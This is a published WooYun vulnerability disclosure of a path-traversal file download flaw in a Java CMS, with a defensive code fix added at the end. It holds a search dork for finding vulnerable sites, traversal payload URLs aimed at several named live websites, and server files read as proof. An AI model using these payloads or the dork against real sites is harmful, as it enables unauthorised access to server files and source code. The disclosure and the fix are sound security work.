
Defect ID: wooyun-2015-0115521

Title: Arbitrary file download in a certain site-builder system

Vendor: cnvd

Author: Hero

Submitted: 2015-05-22 14:58

Fixed: 2015-08-24 13:40

Published: 2015-08-24 13:40

Vulnerability type: arbitrary file traversal/download

Severity: High

Self-assessed Rank: 20

Status: handed to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-05-22: Details sent to the vendor; awaiting vendor handling
2015-05-26: Vendor confirmed; details visible to the vendor only
2015-05-29: Details opened to third-party security partners
2015-07-20: Details opened to core white hats and domain experts
2015-07-30: Details opened to regular white hats
2015-08-09: Details opened to intern white hats
2015-08-24: Details made public

Brief description:

"Why do you have my source code?"
"Is that my fault?"

Detailed description:

WooYun: Generic SQL injection in a certain site-builder system #2
Same system again.
It also has an arbitrary file download.
Affects the China Science and Technology Education Network and some foreign-trade websites.
Keyword: inurl:contentmanager.do?method=view
Vulnerable page: webedit/uploadfile.do?action=open&filepath=
Examples:
http://www.cnstedu.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://kxsz.gdec.net/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://www.cimuset.org/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://www.fdstmc.org.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://www.chinaworldmall.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://www.sqkpym.org.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
[Screenshots omitted (www.cnstedu.cn and others); the image files were not preserved]

Proof:

boot.ini

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(1)partition(2)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(1)partition(2)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect


cms/cmsapp/search.jsp

<%@ page import="com.jalor.cms.column.CMSColumn,
com.jalor.util.treemodel.FolderPath,
com.jalor.util.Function,
com.jalor.cms.actionform.ContentForm,
com.jalor.cms.actionform.ContentAttachmentForm,
com.jalor.cms.content.ContentAttachment,
java.util.Collection,
java.util.Iterator,
java.util.Properties,
com.jalor.cms.actionform.ColumnForm"%>
<%@ page contentType="text/html;charset=GBK" language="java" %>
<%@ taglib uri = "/WEB-INF/jalorportal.tld" prefix = "portal"%>
<%@ taglib uri = "/WEB-INF/jalorcms.tld" prefix = "cms"%>
<%@ taglib uri="/WEB-INF/struts-html.tld" prefix="html" %>
<%@ taglib uri="/WEB-INF/struts-bean.tld" prefix="bean" %>
<%@ taglib uri="/WEB-INF/struts-logic.tld" prefix="logic" %>
<%@include file="/include/currentuserinfo.jsp"%>
<%@include file="/include/pageexpires.jsp"%>
<%@include file="/include/filepath.jsp"%>
<%
ColumnForm column=(ColumnForm)request.getAttribute("CMSColumnForm");
String url="";
%>
<portal:moduleconfig>
<logic:iterate id="pathinfo" name="columnpath" scope="request">
<%
FolderPath folderPath=(FolderPath)pageContext.getAttribute("pathinfo");
String name=folderPath.getFoldername();
url="/cms/columnmanager.do?method=list&id="+folderPath.getFolderid();
%>
<portal:navigation name="<%=name%>" url="<%=url%>"/>
</logic:iterate>
<%
String columnurl="/cms/columnmanager.do?method=list&id="+column.getId();
%>
<portal:navigation name="<%=column.getName()%>" url="<%=columnurl%>"/>
<portal:pagetab name="搜索" url=""/>
<portal:toolbutton name="返回" url="<%=columnurl%>" image=""/>
</portal:moduleconfig>
<portal:standardstyle insertTemplate="standardheader.vm"/>
<script language="javascript">
</script>
<form action="/cms/contentattachment" method="post">
<input type="hidden" name="method" value="search">
<input type="hidden" name="columnid" value="<%=column.getId()%>">
<table width="90%" bordercolorlight="#000000" bordercolordark="#ffffff" class="labeltable_middle_table">
<tr>
<td class="labeltable_middle_td" align="center">标题</td>
<td class="labeltable_middle_td" align="center">作者</td>
</tr>
<%
Collection lstResult=(Collection)request.getAttribute("resultset");
for(Iterator it=lstResult.iterator();it.hasNext();)
{
Properties prop=(Properties)it.next();
%>
<tr>
<td><a href="/cms/contentmanager.do?method=edit&pageid=edit&columnid=<%=column.getId()%>&templateid=<%=column.getTemplateid()%>&id=<%=prop.getProperty("contentid")%>"><%=prop.getProperty("title","")%></a></td>
<td><%=prop.getProperty("author","")%></td>
</tr>
<%
}
%>
</table>
</form>
<portal:standardstyle insertTemplate="standardfooter.vm" />


Fix suggestion:

Restrict directory permissions?
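Beyond filesystem permissions on the service account, the handler itself should refuse any `filepath` that escapes the upload directory. The following is an added example written for this page, not code from the affected product or from the report's author; the `SafeDownload` class, the `UPLOAD_ROOT` location and the method name are assumptions, and it shows the confinement check that a download endpoint like `uploadfile.do?action=open&filepath=` should apply before opening anything:

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

/**
 * Added example (not the product's own code): confine a user-supplied
 * "filepath" parameter to the upload directory before it is opened.
 */
public class SafeDownload {

    /** Hypothetical upload root for illustration; the real deployment path differs. */
    static final Path UPLOAD_ROOT =
            Paths.get("/opt/app/webapps/ROOT/webedit/uploadfile").toAbsolutePath().normalize();

    /**
     * Resolve a client-supplied relative name against {@code root} and return the
     * real path only if it is still a regular file inside the root.
     * Returns null for absolute paths, traversal attempts, symlink escapes and
     * missing files, so the caller can answer 400/404 instead of serving the file.
     */
    public static Path resolveInsideRoot(Path root, String requested) throws IOException {
        if (requested == null || requested.isEmpty()) {
            return null;
        }
        Path candidate = Paths.get(requested);
        // Only relative names under the root are legitimate download targets.
        if (candidate.isAbsolute()) {
            return null;
        }
        // Collapse "." and ".." lexically, then check containment by path component
        // (Path.startsWith compares components, so "/uploads2" does not match "/uploads").
        Path normalized = root.resolve(candidate).normalize();
        if (!normalized.startsWith(root)) {
            return null; // e.g. "../../../../cms/cmsapp/search.jsp" leaves the root
        }
        if (!Files.exists(normalized)) {
            return null;
        }
        // Resolve symlinks on both sides so a link inside the root cannot point outside it.
        Path real = normalized.toRealPath();
        Path realRoot = root.toRealPath();
        if (!real.startsWith(realRoot) || !Files.isRegularFile(real)) {
            return null;
        }
        return real;
    }

    /** Stand-alone demo using a constructed temporary upload directory. */
    public static void main(String[] args) throws IOException {
        Path tmpRoot = Files.createTempDirectory("uploads");
        Files.write(tmpRoot.resolve("report.pdf"), "demo".getBytes());

        System.out.println(resolveInsideRoot(tmpRoot, "report.pdf"));                  // real path inside root
        System.out.println(resolveInsideRoot(tmpRoot, "../../../../cms/cmsapp/search.jsp")); // null (rejected)
        System.out.println(resolveInsideRoot(tmpRoot, "/etc/hosts"));                  // null (absolute)
        System.out.println(resolveInsideRoot(tmpRoot, "missing.pdf"));                 // null (not found)
    }
}
```

The two-stage check matters: the lexical `normalize()` test catches `..` sequences before any filesystem access, and the `toRealPath()` test afterwards catches a symlink inside the upload directory that points elsewhere. Rejected requests are worth logging, since a burst of `filepath` values containing `..` against this endpoint is the signature a detection rule should look for.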

Copyright notice: please credit the source when reposting. Hero@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-05-26 13:38

Vendor reply:

CNVD confirms the reported vulnerability; no direct handling channel with the software producer has been established yet, pending claim.

Latest status:

None yet